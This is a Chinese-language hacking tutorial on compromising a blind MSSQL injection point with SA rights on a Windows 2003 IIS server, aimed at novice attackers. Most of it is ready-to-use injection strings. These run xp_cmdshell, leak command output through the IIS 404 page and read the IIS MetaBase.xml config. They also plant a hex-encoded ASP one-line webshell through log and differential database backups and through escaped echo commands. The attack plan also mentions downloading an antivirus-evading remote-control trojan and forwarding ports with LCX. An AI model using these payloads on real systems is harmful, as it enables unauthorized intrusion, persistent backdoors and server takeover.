MSSQL注入SA权限不显错模式下的入侵

一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。
我这里使用的是火狐的插件提交参数。跟在浏览器里直接提交一样。


这里的主机环境：MSSQL+JSP权限为不显错的SA，支持多行执行xp_cmdshell存活服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是C:\Windows\Help\iisHelp\common\404b.htm。
思路：
首先：
通过XP_CMDSHELL执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
1.日志备份获得Webshell
2.数据库差异备份获得Webshell
4.直接下载免杀远控木马。
5.直接下载LCX将服务器端口转发出来
6.通过XP_CMDSHELL执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
 
 
 
◆日志备份：


1.进行初始备份

;AlterDatabaseTestDBSetRecoveryFullDropTabletttCreateTablettt(aimage)BackupLogTestDBtodisk='<e:\wwwroot\m.asp>'WithInit--
2.插入数据

;InsertIntotttValues(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E为一句话木马%><%eval(request(chr(97))):response.end%>



3.备份并获得文件，删除临时表

;BackupLog<数据库名>ToDisk='<e:\wwwroot\m.asp>';DropTabletttAlterDatabaseTestDBSetRecoverySIMPLE--
&nbsp;
◆数据库差异备份
（1.进行差异备份准备工作
;Declare@aSysname;Set@a=db_name();Declare@fileVarChar(400);Set@file=<0x633A5C746573742E617370>;DropTabletttCreateTablettt(cImage)BackupDatabase@aToDisk=@file--
上面的0x633A5C746573742E617370是c:\test.asp路径转换后的16进制编码


（2.将数据写入到数据库

;InsertIntotttValues(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E为一句话木马%><%eval(request(chr(97))):response.end%>
3.备份数据库并清理临时文件
;Declare@bSysName;Set@b=db_name();Declare@file1VarChar(400);Set@file1=<0x633A5C746573742E617370>;BackupDatabase@bToDisk=@file1WithDifferential,Format;DropTablettt;--
0x633A5C746573742E617370为c:\test.asp删除临时文件
&nbsp;
用^转义字符来写ASP(一句话木马)文件的方法:
1.注入点后执行http://192.168.1.5/display.asp?keyno=1881;execmaster.dbo.xp_cmdshell'echo^<scriptlanguage=VBScriptrunat=server^>executerequest^(&quot;90&quot;^)^</script^>>c:\mu.asp';--
2.CMD下执行echo^<%execute^(request^(&quot;l&quot;^)^)%^>>c:\mu.asp
读取IIS配置信息获取web路径


注入点后面执行;execmaster..xp_cmdshell'copyC:\Windows\system32\inetsrv\MetaBase.xmlC:\Windows\Help\iisHelp\common\404b.htm'--
执行命令



注入点后面执行;execmaster..xp_cmdshell'ver>C:\Windows\Help\iisHelp\common\404b.htm'--

&nbsp;
&nbsp;
&nbsp;
*